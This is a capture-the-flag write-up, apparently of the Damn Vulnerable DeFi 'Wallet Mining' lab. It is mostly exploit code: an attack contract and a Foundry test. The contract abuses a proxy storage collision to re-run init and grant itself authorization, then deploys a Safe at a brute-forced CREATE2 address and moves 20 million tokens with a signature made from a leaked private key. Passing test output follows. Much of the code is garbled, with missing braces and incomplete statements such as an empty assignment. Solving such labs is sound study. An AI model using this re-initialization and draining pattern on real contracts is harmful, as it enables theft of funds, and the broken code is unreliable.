There’s a contract that incentivizes users to deploy Safe wallets, rewarding them with 1 DVT. It integrates with an upgradeable authorization mechanism, only allowing certain deployers (a.k.a. wards) to be paid for specific deployments.
The deployer contract only works with a Safe factory and copy set during deployment. It looks like the Safe singleton factory is already deployed.
The team transferred 20 million DVT tokens to a user at 0x8be6a88D3871f793aD5D5e24eF39e1bf5be31d2b, where her plain 1-of-1 Safe was supposed to land. But they lost the nonce they should use for deployment.
To make matters worse, there’s been rumours of a vulnerability in the system. The team’s freaked out. Nobody knows what to do, let alone the user. She granted you access to her private key.
You must save all funds before it’s too late!
Recover all tokens from the wallet deployer contract and send them to the corresponding ward. Also save and return all user’s funds.
In a single transaction.
The WalletDeployer
contract provides a drop
function that deploys a new Safe wallet using a nonce, as shown below:
function drop(address aim, bytes memory wat, uint256 num) external returns (bool) {
if (mom != address(0) && !can(msg.sender, aim)) {
return false;
if (address(cook.createProxyWithNonce(cpy, wat, num)) != aim) {
return false;
if (IERC20(gem).balanceOf(address(this)) >= pay) {
IERC20(gem).transfer(msg.sender, pay);
return true;
To deploy a Safe
wallet at the address 0x8be6a88D3871f793aD5D5e24eF39e1bf5be31d2b
, we first need to determine the correct nonce. This can be done using vm.computeCreate2Address
to calculate the contract address before deployment. By providing the salt
(calculated similarly to how it's done in the SafeProxyFactory contract), the initCodeHash
, and the deployer
address, we can compute and compare the result with 0x8be6a88D3871f793aD5D5e24eF39e1bf5be31d2b
to find the correct nonce:
address[] memory walletOwners = new address[](1);
walletOwners[0] = user;
bytes memory initializer =
abi.encodeCall(Safe.setup, (walletOwners, 1, address(0), "", address(0), address(0), 0, payable(0)));
uint256 saltNonce;
address target;
bytes32 initCodeHash =
keccak256(abi.encodePacked(type(SafeProxy).creationCode, uint256(uint160(address(singletonCopy)))));
while (target != USER_DEPOSIT_ADDRESS) {
bytes32 salt = keccak256(abi.encodePacked(keccak256(initializer), saltNonce));
target = vm.computeCreate2Address(salt, initCodeHash, address(proxyFactory));
However, the drop
function only permits authorized addresses to perform deployments. Thus, we need a way to grant ourselves authorization.
In the AuthorizerUpgradeable
contract, the first storage slot is used for the needsInit
contract AuthorizerUpgradeable {
uint256 public needsInit = 1;
constructor() {
needsInit = 0; // freeze implementation
function init(address[] memory _wards, address[] memory _aims) external {
require(needsInit != 0, "cannot init");
for (uint256 i = 0; i < _wards.length; i++) {
_rely(_wards[i], _aims[i]);
needsInit = 0;
Meanwhile, in the TransparentProxy
contract, the first storage slot is occupied by the upgrader
contract TransparentProxy is ERC1967Proxy {
address public upgrader = msg.sender;
constructor(address _logic, bytes memory _data) ERC1967Proxy(_logic, _data) {
There is a clear storage collision between the proxy contract and the implementation contract. As a result, we can exploit this by calling the init
function through the proxy contract, allowing us to set ourselves as an authorized address.
Once we have authorization, we can call the drop
function using the salt
value we previously calculated to deploy the Safe wallet at 0x8be6a88D3871f793aD5D5e24eF39e1bf5be31d2b. Since the user owns the deployed wallet, and we have access to the user’s private key, we can move the 20 million DVT tokens from the Safe
wallet to the user’s address by calling the execTransaction
Note: Before executing the execTransaction
function, the transaction hash must be signed with the user’s private key. However, since the Safe wallet is not yet deployed, we cannot use the getTransactionHash()
function to get the transaction hash. Instead, we must calculate the transaction hash manually.
- Determine the lost nonce required to deploy the
wallet at0x8be6a88D3871f793aD5D5e24eF39e1bf5be31d2b
. - Manually calculate the transaction hash, as the Safe wallet is not yet deployed for now.
- Sign the transaction hash using the user's private key. The resulting signature will be used in step 6.
- Call the
function in theWalletDeployer
contract to deploy aSafe
wallet at0x8be6a88D3871f793aD5D5e24eF39e1bf5be31d2b
. - Transfer the reward token to
address - Use the signature to send a transaction, rescuing the 20 million DVT tokens to the user address.
// SPDX-License-Identifier: MIT
pragma solidity =0.8.25;
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {Safe, Enum} from "@safe-global/safe-smart-account/contracts/Safe.sol";
import {AuthorizerUpgradeable} from "./AuthorizerUpgradeable.sol";
import {WalletDeployer} from "./WalletDeployer.sol";
contract AttackWalletDeployer {
address private constant USER = 0x6CA6d1e2D5347Bfab1d91e883F1915560e09129D;
address private constant USER_DEPOSIT_ADDRESS = 0x8be6a88D3871f793aD5D5e24eF39e1bf5be31d2b;
address private constant WARD = 0x89305C9663472C41251FBC479bCd3DE7553A7EB1;
uint256 private constant INITIAL_WALLET_DEPLOYER_TOKEN_BALANCE = 1 ether;
uint256 private constant DEPOSIT_TOKEN_AMOUNT = 20_000_000e18;
address _token,
address _authorizer,
address _walletDeployer,
bytes memory initializer,
uint256 nonce,
bytes memory signature
) {
address[] memory wards = new address[](1);
address[] memory aims = new address[](1);
wards[0] = address(this);
// set this contract as the authorized address.
AuthorizerUpgradeable(_authorizer).init(wards, aims);
// use the nonce to deploy a Safe wallet at the USER_DEPOSIT_ADDRESS address
WalletDeployer(_walletDeployer).drop(USER_DEPOSIT_ADDRESS, initializer, nonce);
// transfer the rewards to the ward address
// recover the tokens from the Safe wallet to the user's address
abi.encodeWithSignature("transfer(address,uint256)", USER, DEPOSIT_TOKEN_AMOUNT),
// SPDX-License-Identifier: MIT
// Damn Vulnerable DeFi v4 (
pragma solidity =0.8.25;
import {Test, console} from "forge-std/Test.sol";
import {SafeProxyFactory} from "@safe-global/safe-smart-account/contracts/proxies/SafeProxyFactory.sol";
import {SafeProxy} from "@safe-global/safe-smart-account/contracts/proxies/SafeProxy.sol";
import {Safe, OwnerManager, Enum} from "@safe-global/safe-smart-account/contracts/Safe.sol";
import {Create2} from "@openzeppelin/contracts/utils/Create2.sol";
import {DamnValuableToken} from "../../src/DamnValuableToken.sol";
import {WalletDeployer} from "../../src/wallet-mining/WalletDeployer.sol";
import {
AuthorizerFactory, AuthorizerUpgradeable, TransparentProxy
} from "../../src/wallet-mining/AuthorizerFactory.sol";
import {AttackWalletDeployer} from "src/wallet-mining/AttackWalletDeployer.sol";
contract WalletMiningChallenge is Test {
address deployer = makeAddr("deployer");
address upgrader = makeAddr("upgrader");
address ward = makeAddr("ward");
address player = makeAddr("player");
address user;
uint256 userPrivateKey;
address constant USER_DEPOSIT_ADDRESS = 0x8be6a88D3871f793aD5D5e24eF39e1bf5be31d2b;
uint256 constant DEPOSIT_TOKEN_AMOUNT = 20_000_000e18;
address constant SAFE_SINGLETON_FACTORY_ADDRESS = 0x914d7Fec6aaC8cd542e72Bca78B30650d45643d7;
DamnValuableToken token;
AuthorizerUpgradeable authorizer;
WalletDeployer walletDeployer;
SafeProxyFactory proxyFactory;
Safe singletonCopy;
uint256 initialWalletDeployerTokenBalance;
modifier checkSolvedByPlayer() {
vm.startPrank(player, player);
function setUp() public {
// Player should be able to use the user's private key
(user, userPrivateKey) = makeAddrAndKey("user");
// Deploy token
token = new DamnValuableToken();
// Deploy authorizer with a ward authorized to deploy at DEPOSIT_ADDRESS
address[] memory wards = new address[](1);
wards[0] = ward;
address[] memory aims = new address[](1);
AuthorizerFactory authorizerFactory = new AuthorizerFactory();
authorizer = AuthorizerUpgradeable(authorizerFactory.deployWithProxy(wards, aims, upgrader));
// Send big bag full of DVT tokens to the deposit address
// Include Safe singleton factory in this chain
// Call singleton factory to deploy copy and factory contracts
(bool success, bytes memory returndata) =
address(SAFE_SINGLETON_FACTORY_ADDRESS).call(bytes.concat(bytes32(""), type(Safe).creationCode));
singletonCopy = Safe(payable(address(uint160(bytes20(returndata)))));
(success, returndata) =
address(SAFE_SINGLETON_FACTORY_ADDRESS).call(bytes.concat(bytes32(""), type(SafeProxyFactory).creationCode));
proxyFactory = SafeProxyFactory(address(uint160(bytes20(returndata))));
// Deploy wallet deployer
walletDeployer = new WalletDeployer(address(token), address(proxyFactory), address(singletonCopy));
// Set authorizer in wallet deployer
// Fund wallet deployer with tokens
initialWalletDeployerTokenBalance =;
token.transfer(address(walletDeployer), initialWalletDeployerTokenBalance);
function test_assertInitialState() public view {
// Check initialization of authorizer
assertNotEq(address(authorizer), address(0));
assertEq(TransparentProxy(payable(address(authorizer))).upgrader(), upgrader);
assertTrue(authorizer.can(ward, USER_DEPOSIT_ADDRESS));
assertFalse(authorizer.can(player, USER_DEPOSIT_ADDRESS));
// Check initialization of wallet deployer
assertEq(walletDeployer.chief(), deployer);
assertEq(walletDeployer.gem(), address(token));
assertEq(, address(authorizer));
// Ensure DEPOSIT_ADDRESS starts empty
assertEq(USER_DEPOSIT_ADDRESS.code, hex"");
// Factory and copy are deployed correctly
assertEq(address(walletDeployer.cook()).code, type(SafeProxyFactory).runtimeCode, "bad cook code");
assertEq(walletDeployer.cpy().code, type(Safe).runtimeCode, "no copy code");
// Ensure initial token balances are set correctly
assertGt(initialWalletDeployerTokenBalance, 0);
assertEq(token.balanceOf(address(walletDeployer)), initialWalletDeployerTokenBalance);
assertEq(token.balanceOf(player), 0);
function test_walletMining() public checkSolvedByPlayer {
// Find the lost nonce for deploying the safe wallet at USER_DEPOSIT_ADDRESS
address[] memory walletOwners = new address[](1);
walletOwners[0] = user;
bytes memory initializer =
abi.encodeCall(Safe.setup, (walletOwners, 1, address(0), "", address(0), address(0), 0, payable(0)));
uint256 saltNonce;
address target;
bytes32 initCodeHash =
keccak256(abi.encodePacked(type(SafeProxy).creationCode, uint256(uint160(address(singletonCopy)))));
while (target != USER_DEPOSIT_ADDRESS) {
bytes32 salt = keccak256(abi.encodePacked(keccak256(initializer), saltNonce));
target = vm.computeCreate2Address(salt, initCodeHash, address(proxyFactory));
// calculate transaction hash
bytes memory data = abi.encodeWithSignature("transfer(address,uint256)", user, DEPOSIT_TOKEN_AMOUNT);
bytes32 domainSeparator = keccak256(
0x47e79534a245952e8b16893a336b85a3d9ea9fa8c573f3d803afb92a79469218, //DOMAIN_SEPARATOR_TYPEHASH
bytes32 safeTxHash = keccak256(
0xbb8310d486368db6bd6f849402fdd73ad53d316b5a4b2644ad6efe0f941286d8, // SAFE_TX_TYPEHASH
token, // to
0, // value
keccak256(data), // data
Enum.Operation.Call, // operation
0, // safeTxGas
0, // baseGas
0, // gasPrice
0, // gasToken
payable(0), // refundReceiver
0 // _nonce
bytes32 txHash = keccak256(abi.encodePacked(bytes1(0x19), bytes1(0x01), domainSeparator, safeTxHash));
// sign the transaction hash with the user's private key
(uint8 v, bytes32 r, bytes32 s) = vm.sign(userPrivateKey, txHash);
bytes memory signature = abi.encodePacked(r, s, v);
emit log("-------------------------- Before exploit --------------------------");
emit log_named_decimal_uint(
"token balance in the wallet deployer contract", token.balanceOf(address(walletDeployer)), token.decimals()
emit log_named_decimal_uint(
"token balance in the user's safe wallet", token.balanceOf(address(USER_DEPOSIT_ADDRESS)), token.decimals()
emit log_named_decimal_uint("token balance in the ward", token.balanceOf(address(ward)), token.decimals());
emit log_named_decimal_uint("token balance in the user", token.balanceOf(address(user)), token.decimals());
// deploy malicious contract to exploit the vulnerability
new AttackWalletDeployer(
address(token), address(authorizer), address(walletDeployer), initializer, saltNonce, signature
emit log("-------------------------- After exploit --------------------------");
emit log_named_decimal_uint(
"token balance in the wallet deployer contract", token.balanceOf(address(walletDeployer)), token.decimals()
emit log_named_decimal_uint(
"token balance in the user's safe wallet", token.balanceOf(address(USER_DEPOSIT_ADDRESS)), token.decimals()
emit log_named_decimal_uint("token balance in the ward", token.balanceOf(address(ward)), token.decimals());
emit log_named_decimal_uint("token balance in the user", token.balanceOf(address(user)), token.decimals());
function _isSolved() private view {
// Factory account must have code
assertNotEq(address(walletDeployer.cook()).code.length, 0, "No code at factory address");
// Safe copy account must have code
assertNotEq(walletDeployer.cpy().code.length, 0, "No code at copy address");
// Deposit account must have code
assertNotEq(USER_DEPOSIT_ADDRESS.code.length, 0, "No code at user's deposit address");
// The deposit address and the wallet deployer must not hold tokens
assertEq(token.balanceOf(USER_DEPOSIT_ADDRESS), 0, "User's deposit address still has tokens");
assertEq(token.balanceOf(address(walletDeployer)), 0, "Wallet deployer contract still has tokens");
// User account didn't execute any transactions
assertEq(vm.getNonce(user), 0, "User executed a tx");
// Player must have executed a single transaction
assertEq(vm.getNonce(player), 1, "Player executed more than one tx");
// Player recovered all tokens for the user
assertEq(token.balanceOf(user), DEPOSIT_TOKEN_AMOUNT, "Not enough tokens in user's account");
// Player sent payment to ward
assertEq(token.balanceOf(ward), initialWalletDeployerTokenBalance, "Not enough tokens in ward's account");
Ran 2 tests for test/wallet-mining/WalletMining.t.sol:WalletMiningChallenge
[PASS] test_assertInitialState() (gas: 148151)
[PASS] test_walletMining() (gas: 475433)
-------------------------- Before exploit --------------------------
token balance in the wallet deployer contract: 1.000000000000000000
token balance in the user's safe wallet: 20000000.000000000000000000
token balance in the ward: 0.000000000000000000
token balance in the user: 0.000000000000000000
-------------------------- After exploit --------------------------
token balance in the wallet deployer contract: 0.000000000000000000
token balance in the user's safe wallet: 0.000000000000000000
token balance in the ward: 1.000000000000000000
token balance in the user: 20000000.000000000000000000
Suite result: ok. 2 passed; 0 failed; 0 skipped; finished in 15.85ms (6.24ms CPU time)
Ran 1 test suite in 235.28ms (15.85ms CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)